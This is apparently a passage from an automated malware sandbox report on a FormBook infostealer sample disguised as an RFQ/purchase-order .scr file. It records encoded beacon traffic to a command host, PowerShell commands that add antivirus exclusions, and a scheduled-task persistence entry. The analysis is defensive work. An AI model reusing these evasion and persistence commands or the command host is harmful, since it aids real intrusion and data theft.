                                                                                                            Data Raw: 78 34 3d 75 4e 38 55 45 2f 47 2b 45 4c 69 44 4f 65 79 47 78 68 38 78 67 58 74 75 57 53 4b 42 59 2b 6d 37 50 6a 70 31 78 58 4b 68 75 52 2b 45 70 59 6d 2f 76 58 68 79 5a 6f 54 57 58 57 38 73 55 70 33 67 66 77 69 6f 2f 58 37 6a 6e 61 4d 70 70 78 6b 58 4b 6a 47 4a 6f 68 4e 31 75 6e 71 75 6a 41 54 65 55 32 4d 64 33 50 35 4a 33 55 44 49 42 6f 64 37 42 43 5a 38 2b 33 42 42 62 41 35 77 36 63 51 31 44 4e 38 6b 52 4d 6b 67 6e 62 57 61 4c 49 39 57 6f 68 51 33 31 5a 57 6c 67 66 55 4a 33 64 32 72 7a 35 6a 35 5a 52 71 67 69 4d 53 72 72 47 4e 41 4f 31 37 5a 6a 35 41 41 75 73 67 63 42 4c 37 78 2b 4e 55 33 62 57 7a 59 31 54 68 53 48 2b 54 6a 57 35 58 63 4a 49 4b 57 77 6c 7a 78 49 2b 58 49 53 30 69 45 43 46 65 70 6d 2b 51 4e 2b 37 4b 2b 47 77 73 4d 72 34 52 46 58 30 44 6d 48 4a 36 4e 65 49 78 61 78 78 37 6d 43 4b 39 6f 64 6a 49 41 50 33 7a 6d 53 36 71 45 31 32 72 72 2f 69 58 6b 71 72 4a 77 71 2f 4c 58 64 63 4b 5a 70 52 55 4f 4b 33 6f 6f 75 71 46 42 34 55 66 55 6a 76 2b 44 38 30 48 32 4d 76 7a 5a 67 69 66 33 55 6e 43 [TRUNCATED]
                                                                                                            Data Ascii: x4=uN8UE/G+ELiDOeyGxh8xgXtuWSKBY+m7Pjp1xXKhuR+EpYm/vXhyZoTWXW8sUp3gfwio/X7jnaMppxkXKjGJohN1unqujATeU2Md3P5J3UDIBod7BCZ8+3BBbA5w6cQ1DN8kRMkgnbWaLI9WohQ31ZWlgfUJ3d2rz5j5ZRqgiMSrrGNAO17Zj5AAusgcBL7x+NU3bWzY1ThSH+TjW5XcJIKWwlzxI+XIS0iECFepm+QN+7K+GwsMr4RFX0DmHJ6NeIxaxx7mCK9odjIAP3zmS6qE12rr/iXkqrJwq/LXdcKZpRUOK3oouqFB4UfUjv+D80H2MvzZgif3UnC+FBQfw/mFAOJuUXzDHO5hEg8jtWgpt5UF6Y3ZMrcRaNgvNrUDXT8rfI1bABvryouZuvYS6hvzxR+Gtbqw5ngf96/oDmNoDvJXwy91magW4z1xE9drBXgq02Rr8PRfNW3JE7uLOPsG53TPHw3lZQgzJ/GkanLRBgu9pM+aQGNA/8caK08oWIVvUZFuYS0YqTCm+SFI956SfW+GKR1CAcnuXb4KNlsvyIcnkyjuyYrSlFZFtkQT33DqMGqV6Jnz8S6Xxa7jU5LeWaQimHFWi1sdXwh/cfTrNjYyahf8bCmV3lub4rEvMm8deTOcnf8NCpRPPrBtClmdLk71FqEEXdtaVPF2XlGwCG9Tk1v3j7l0WSsvuDK9WVO7VGqJmaibLz+ONYJnTLes92pZQ/8EgPngWgExP7bGI8b6wVgeh9nRLuxBNsqOU2/1sjgvJPECEMCp6fOD7sbkEocbc3SPqw4SoZ/V5FiEGPbboWH3fBfOQjYJ99NcxUcPi9bQFZYjXN2/3wDO9zl5MOQe6GZ0ZMh0iBL+fVnRIDLEVl0TnEGiZ6cZWImwtD6KGG4TQ1S4jX+uWf6lLGnY5nwVYVBvWwd0nRhw2Ojy2dT9Erc5jsSDeepJRyLduzSvyIV0Tqs8k88y2SkbKfv1pizghLxVQIuKJwi+HuJKwSVBi [TRUNCATED]
                                                                                                            Dec 12, 2024 10:23:42.502367020 CET285OUTData Raw: 2f 2b 5a 4d 62 76 75 71 66 30 31 41 50 4a 36 48 45 43 46 64 37 4b 72 4a 4b 56 34 65 67 75 53 37 46 46 65 30 2b 4c 70 57 70 4e 6e 71 67 4a 78 72 32 67 63 45 75 68 36 38 61 71 36 4e 76 5a 4a 61 65 70 2b 4e 4d 32 58 44 56 5a 32 37 32 42 64 41 4a 67
                                                                                                            Data Ascii: /+ZMbvuqf01APJ6HECFd7KrJKV4eguS7FFe0+LpWpNnqgJxr2gcEuh68aq6NvZJaep+NM2XDVZ272BdAJgaMyuVX7Q61827laYVDNz/dvV8h1+OckutCRpJHLUYYpRDFDJxxXgrUL0peIVqhlDOz11V3ucgpfehldVKRO41i1JZjOYBlperIiNev0FZUhne+dX5FTyX843Epj8Hq6e1zT6fdMuLG3qD/cxCA9mzXgPjdCKAkzHF
                                                                                                            Dec 12, 2024 10:23:43.603740931 CET959INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:23:43 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiFVU4h0fkkU8Pefzot4px3xPyk0Mp7u6Q2EojwrvNTgIo3223LnSwzYfZI3f1EnvaipqjCnUVci%2FP7WTODlFrLX3FnXqePhaIaP6IIljAaBt49elFE2mjYIL64W%2FWAA"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca843aeda4269-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2322&min_rtt=2322&rtt_var=1161&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2757&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                                                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                                                                            Dec 12, 2024 10:23:43.603996038 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            47192.168.2.2249212172.67.145.23480
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:45.458267927 CET796OUTPOST /ge5i/ HTTP/1.1
                                                                                                            Host: www.vayui.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.vayui.top
                                                                                                            Referer: http://www.vayui.top/ge5i/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 75 4e 38 55 45 2f 47 2b 45 4c 69 44 4f 5a 65 47 78 7a 45 78 6a 33 74 75 61 79 4b 42 53 65 6e 77 50 6a 31 4c 78 57 2f 36 75 48 2b 45 6f 4a 32 2f 75 68 39 79 63 6f 54 52 63 32 38 33 61 4a 32 71 66 77 69 53 2f 54 6e 6a 6e 62 73 70 6f 55 6f 58 4d 69 47 49 67 78 4e 33 76 58 71 56 6a 41 66 6c 55 32 51 4e 33 4c 46 4a 33 57 48 49 51 59 74 37 46 67 42 38 37 48 42 48 53 67 34 6d 36 64 73 6b 44 4a 67 57 52 50 41 67 6e 71 4b 61 46 38 78 57 2b 69 34 33 73 4a 57 6b 71 2f 56 32 2f 64 76 67 36 70 58 49 55 41 57 64 6e 34 57 50 6e 55 70 4d 4f 57 79 5a 6f 72 4a 73 6f 59 38 4e 4f 59 69 76 70 51 3d 3d
                                                                                                            Data Ascii: x4=uN8UE/G+ELiDOZeGxzExj3tuayKBSenwPj1LxW/6uH+EoJ2/uh9ycoTRc283aJ2qfwiS/TnjnbspoUoXMiGIgxN3vXqVjAflU2QN3LFJ3WHIQYt7FgB87HBHSg4m6dskDJgWRPAgnqKaF8xW+i43sJWkq/V2/dvg6pXIUAWdn4WPnUpMOWyZorJsoY8NOYivpQ==
                                                                                                            Dec 12, 2024 10:23:46.671324015 CET961INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:23:46 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSwgAPS8SaycOJ1sORdTduPG3AcX16aUGES9tKRy2V9o0ptbx5UcojZr7ZVbAoEOl9njSD%2B8FpeYx4T3hU7y18QF32GKkSrA9RkhcXzf6dEaPJkykgmK8Qn1r1I9kYfk"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca856dc487ce2-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2031&min_rtt=2031&rtt_var=1015&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            48192.168.2.2249213172.67.145.23480
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:48.118287086 CET2472OUTPOST /ge5i/ HTTP/1.1
                                                                                                            Host: www.vayui.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.vayui.top
                                                                                                            Referer: http://www.vayui.top/ge5i/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 75 4e 38 55 45 2f 47 2b 45 4c 69 44 49 35 4f 47 79 53 45 78 32 48 74 74 55 53 4b 42 59 2b 6d 35 50 6a 70 4c 78 58 4b 68 75 54 61 45 70 59 36 2f 76 48 68 79 61 6f 54 52 61 32 38 73 55 70 33 68 66 77 32 34 2f 51 7a 5a 6e 65 38 70 70 7a 4d 58 4b 67 2b 4a 34 78 4e 31 72 58 71 57 6a 41 66 38 55 32 68 47 33 4c 42 76 33 58 76 49 54 71 56 37 4d 77 42 7a 78 6e 42 48 53 67 34 79 36 64 73 49 44 4e 30 4f 52 4f 6f 77 6e 63 6d 61 4c 34 39 57 35 42 51 30 38 35 57 67 6b 66 55 48 33 64 4b 38 7a 35 6a 39 5a 51 4f 4f 69 4d 57 72 71 54 5a 41 4f 30 37 59 2b 35 41 42 67 4d 67 63 43 37 37 33 2b 4e 56 6f 62 57 7a 59 31 54 31 53 47 75 54 6a 57 39 44 44 48 6f 4b 57 36 46 7a 6f 4d 2b 4c 36 53 77 4b 6d 43 45 75 6d 6c 4a 67 4e 2f 35 53 2b 43 41 73 4d 37 59 52 4c 58 30 44 33 49 70 36 37 65 49 4a 34 78 31 58 32 43 4b 39 6f 64 6d 55 41 5a 31 72 6d 62 4b 71 45 71 6d 72 71 78 43 58 6e 71 72 4e 6f 71 2b 2f 58 64 5a 6d 5a 6f 6d 51 4f 4d 78 45 72 6c 36 46 4d 7a 30 66 57 77 2f 2b 73 38 30 62 4d 4d 76 36 38 67 68 48 33 55 6c 71 [TRUNCATED]
                                                                                                            Data Ascii: x4=uN8UE/G+ELiDI5OGySEx2HttUSKBY+m5PjpLxXKhuTaEpY6/vHhyaoTRa28sUp3hfw24/QzZne8ppzMXKg+J4xN1rXqWjAf8U2hG3LBv3XvITqV7MwBzxnBHSg4y6dsIDN0OROowncmaL49W5BQ085WgkfUH3dK8z5j9ZQOOiMWrqTZAO07Y+5ABgMgcC773+NVobWzY1T1SGuTjW9DDHoKW6FzoM+L6SwKmCEumlJgN/5S+CAsM7YRLX0D3Ip67eIJ4x1X2CK9odmUAZ1rmbKqEqmrqxCXnqrNoq+/XdZmZomQOMxErl6FMz0fWw/+s80bMMv68ghH3Ulq+JEkfwPmaUeJqFH/fHOwyEgJBtVkp878F9afYH7cXfNhgJrU1XTwVfLxbA1TrzoOZl+YRthu71R+V0Lrz5nlc9+i1AX9oFfJX3QFy56gp2T1nPdd1BXg+03xR9+pfNWnJFoGLOPsF83TJSArDZQs3J/q0akjRAz29pISaeGNAyccnFU8mWIRVUYtYYCQYqxKm8URI4Z6QQ2+bHx0iAc3uXbdRNlEv8K0nlTju64rs7VZgtkQ133HYMC3i6MXz8T6Xhr7jR5LfUaQmiHF1i1lWXw0ocebrMAgyYVz8bimAqVubxLF8Mml/eSTrnekNFblPKLBqFlmSNk72P6EsXd9aVPB2Xk+wCUVTgEv3+7l2SSsDnj3FWVe3VDTUmbObLi+OKahocbeqsGppBP88gPnSWhMhPK7GPuT6x0gdq9nSS+wDDMq6UyiosgA/I+ECENyp6sqD78bkEocUc3SLqxEsoYPv5FiEEebboEv3VhfHcDYsstMPxUQbi9D6FfsjVYK/3wDJ4Dl4BuQd6GVTZMgViB3+emrRHxTEVGMT1kGia6cacom9tD6aGH0DQ0S4gDyuTdCmJ2nd/nxWS1MvWwRsnTtw28ny0JH9Ebc5hMSAW+oUMiH7uz+RyJlCSbc8rrgylBcaBPvwtiz+hL8lQI2CJwKxHt5KwyVBj [TRUNCATED]
                                                                                                            Dec 12, 2024 10:23:48.237741947 CET1749OUTData Raw: 2f 2b 2b 67 62 75 4f 71 63 35 56 41 53 4a 36 48 53 43 42 78 4e 4b 71 56 38 56 35 75 67 73 7a 62 46 4c 4e 63 2b 58 70 57 72 4e 6e 71 63 55 42 58 39 67 63 46 52 68 2b 38 61 71 36 64 76 5a 4f 6d 65 6f 4f 4e 50 72 58 44 51 65 32 37 78 4b 39 42 4b 67
                                                                                                            Data Ascii: /++gbuOqc5VASJ6HSCBxNKqV8V5ugszbFLNc+XpWrNnqcUBX9gcFRh+8aq6dvZOmeoONPrXDQe27xK9BKgaNDuU7RQ4582ptaJkDNzvdTfchm6OhjutOdpNDbVtUpR1JDDjpXkLUw3peJVqsCDODT1UG7cVRfcRldRIJPzVizfJjPYBlFerwuNfCxFYchnbSdWJFU7H9zyEp58HmTe1rt6Z9MuK637TPchyA9vTXlGDccXQ4wHG
                                                                                                            Dec 12, 2024 10:23:49.334330082 CET968INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:23:49 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gG60QB2uE%2BTi7h7ygzN2wL0kEKf80yQ2CHDyamVOVtC0m7SKsJzqznpr9MXugXfny%2FuKle6Q0yboNKAFIfb1NCUoHM0wuCU2VAiSpMlAd%2BfV%2BE4ZMN8QNjPZ07ha8Ym"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca867883a5e80-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2055&min_rtt=2055&rtt_var=1027&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=4221&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            49192.168.2.2249214172.67.145.23480
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:50.767215014 CET538OUTGET /ge5i/?x4=jPU0HPuwZISEZ5CnqmUb1HxQcmHsEJWSHx9v/3j//xH9iOmom18fULHPXhZRerzvXxOw9xjpncAMgCVYCBSLizB0ok2+/BrdQFUexat22mesfNVGJAdc0xNIeHt8&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.vayui.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:51.985297918 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:23:51 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZ5J7MLtGi6nVmwyiMeJvh6yBddV2nShL4yljVGYh9FTAStbNL4YKeTdwO66%2FN2EzvovszjHDDLlYdIAfKECZsUyxklYrAE5oSBjmfDPGhbsfhryAuhZTFt3pglVxSEm"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca8781d168c72-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1924&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                            Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error pa
                                                                                                            Dec 12, 2024 10:23:51.985342026 CET82INData Raw: 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: ge -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:04:19:38
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Users\user\Desktop\RFQ_P.O.1212024.scr
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S
                                                                                                            Imagebase:0x13d0000
                                                                                                            File size:878'088 bytes
                                                                                                            MD5 hash:BC03B7D0CC3FAA356F5C49609D150B44
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:04:19:44
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr"
                                                                                                            Imagebase:0xd10000
                                                                                                            File size:427'008 bytes
                                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:04:19:45
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                                                                                                            Imagebase:0xd10000
                                                                                                            File size:427'008 bytes
                                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:04:19:45
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp"
                                                                                                            Imagebase:0x700000
                                                                                                            File size:179'712 bytes
                                                                                                            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:04:19:46
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                            Imagebase:0x11b0000
                                                                                                            File size:45'248 bytes
                                                                                                            MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.396612978.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.398641756.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:04:19:46
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\System32\taskeng.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:taskeng.exe {5B36C18D-91BD-4673-848D-E2536B74881F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                                            Imagebase:0xff6a0000
                                                                                                            File size:464'384 bytes
                                                                                                            MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:04:19:48
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\PEJmengI.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\PEJmengI.exe
                                                                                                            Imagebase:0x1150000
                                                                                                            File size:878'088 bytes
                                                                                                            MD5 hash:BC03B7D0CC3FAA356F5C49609D150B44
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
